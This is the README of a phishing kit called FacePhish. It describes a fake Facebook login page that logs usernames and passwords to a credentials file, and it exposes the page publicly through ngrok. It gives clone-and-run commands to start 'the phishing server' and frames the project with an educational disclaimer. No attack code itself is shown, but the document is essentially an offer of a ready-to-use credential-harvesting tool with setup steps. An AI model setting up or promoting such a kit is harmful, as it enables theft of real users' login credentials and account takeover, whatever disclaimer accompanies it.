this repo has no description
1# 🕵️♂️ FacePhish - For Educational Purposes Only
2
3
4
5> ⚠️ **Disclaimer**
6>
7> This project is intended **strictly for educational and ethical hacking awareness purposes only.**
8>
9> - Do **not** use this project for malicious purposes.
10> - The author **does not condone** illegal activity and is **not responsible** for any misuse.
11> - Always conduct security testing **only in authorized environments** with **explicit permission**.
12> - This repository is meant to help individuals and professionals understand phishing mechanics and learn how to defend against them.
13
14
15
16<br>
17
18## 📸 Preview
19
20
21
22
23<br>
24
25## 🚀 Features
26
27- Fake Facebook login page styled like the real interface
28- Logs username and password attempts
29- Automatically generates public forwarding using **ngrok**
30- Logs output in real-time to console
31- Dynamic PHP server running on a random available 4-digit port
32
33
34
35<br>
36
37## ⚙️ Installation & Setup
38
39
40```bash
41# 1. Clone this repository
42git clone https://tangled.sh/@hatixntsoa.bsky.social/facephish
43
44# 2. Change to the project directory
45cd facephish
46
47# 3. Give execution permission to the script
48chmod +x facephish.sh
49
50# 4. Run the phishing server
51./facephish.sh
52```
53
54
55> ✅ Ensure you have both **PHP** and **ngrok** installed on your system.
56
57
58
59<br>
60
61## 📁 Project Structure
62
63
64```
65.
66├── app/
67│ └── facephish.php
68├── assets/
69│ ├── images/
70│ ├── scripts/
71│ └── styles/
72├── data/
73│ └── credentials.txt // saved credentials
74├── logs/
75├── screenshots/
76├── utils/ // shell functions definition
77├── index.html
78├── facephish.sh
79├── LICENSE.md
80└── README.md
81```
82
83
84
85
86<br>
87
88## 📌 Requirements
89
90* **PHP** ≥ 7.x
91* **ngrok** with authenticated account (set up via `ngrok authtoken`)
92* Unix-like environment (Linux/macOS or WSL on Windows)
93
94
95<br>
96
97## 📚 Legal Note
98
99This repository is designed to demonstrate **how phishing works**, so that developers, companies, and users can better understand and **protect themselves** from real threats.
100
101Use it **ethically** and **legally**.